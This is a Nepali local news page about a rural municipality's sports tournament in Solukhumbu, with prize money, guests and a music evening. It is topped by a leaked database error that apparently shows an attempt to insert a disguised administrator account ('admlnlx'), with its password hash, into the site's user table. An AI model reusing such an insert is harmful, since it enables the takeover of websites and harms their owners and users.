WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCh8BNYYGuavoyZH9OHU63pBVjKIZ00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:19:31', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशी अध्यक्ष रनिङशिल्ड सुरु – Gaule Khabar

थुलुङ दुधकोशी अध्यक्ष रनिङशिल्ड सुरु

थुलुङ दुधकोशी अध्यक्ष रनिङशिल्ड सुरु

सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिका अध्यक्ष रनिङ शिल्ड प्रतियोगिता सुरु भएको छ ।

कोशी प्रदेशका माननीया संसद गोम्बु शेर्पा (कर्ज्याङ)को प्रमुख आतिथ्यमा थुलुङ दुधकोशी गाउँपालिका मुक्लिमा आज (बिहिबार) बाट छैटौ अध्यक्ष रनिङ शिल्ड प्रतियोगिता सुरु भएको हो ।

राष्ट्रपति रनिङ शिल्ड प्रतियोगितामा पालिका भित्रका १० वटा माध्यमिक विद्यालयले सहभागिता जनाउदै छन्, भने अध्यक्ष कपका लागि संघीय संरचना अनुसारका वडाबाट महिला तथा पुरुष खेलाडीहको सहभागीता जनाउनेछन ।

जिल्लास्तरीय अन्तर वडा महिला तथा पुरुष अध्यक्ष रनिङ शिल्ड भलिबल प्रतियोगिता तर्फ प्रथम, द्धितिय र तृतिय हुने टिमलाई क्रमशः १ लाख, ७५ हजार, ५० हजारको साथमा ट्रफि, मेडल प्रमाणपत्र प्रदान गरिने छ । खुल्ला महिला तथा पुरुष डबल व्याटमिन्टन प्रतियोगिता तर्फ प्रथम, द्धितिय, तृतियलाई क्रमशः १८ हजार, १४ हजार र १० हजारको साथमा ट्रफि, मेडल प्रमाणपत्र प्रदान गरिने छ ।

उक्त कार्यक्रममा कृषि मेला प्रदर्शन गरिनुका साथै स्थानिय खानाको परिकार समेत प्रदर्शन गरिएको छ । कार्यक्रममा भव्य सांगितिक साँझको समेत आयोजना गरिएको छ । सांगितिक कार्यक्रमको लागि स्थानिय कलाकारको साथमा ख्याती प्राप्त गायक शिव परियार, द भ्याईस अफ सिजन ५ का फाइनलिस्ट कुमार प्रयास लगायत कलाकारको प्रस्तुती रहनेछ ।

कार्यक्रममा जिल्ला समन्वय समिति सोलुखुम्बुका प्रमुख कृष्णा प्रसाद निरौला, प्रमुख जिल्ला अिधाकरी, नेचासल्याङ गाउँपालिका अध्यक्ष धन्जन राई, माप्य दुधकोशी गाउँपालिका उपाध्यक्ष गौरब राई, लगायतका अतिथिहरुको उपस्तिथि रहेको थियो । कार्यक्रम पौष २९ गते सम्म जारी रहने छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका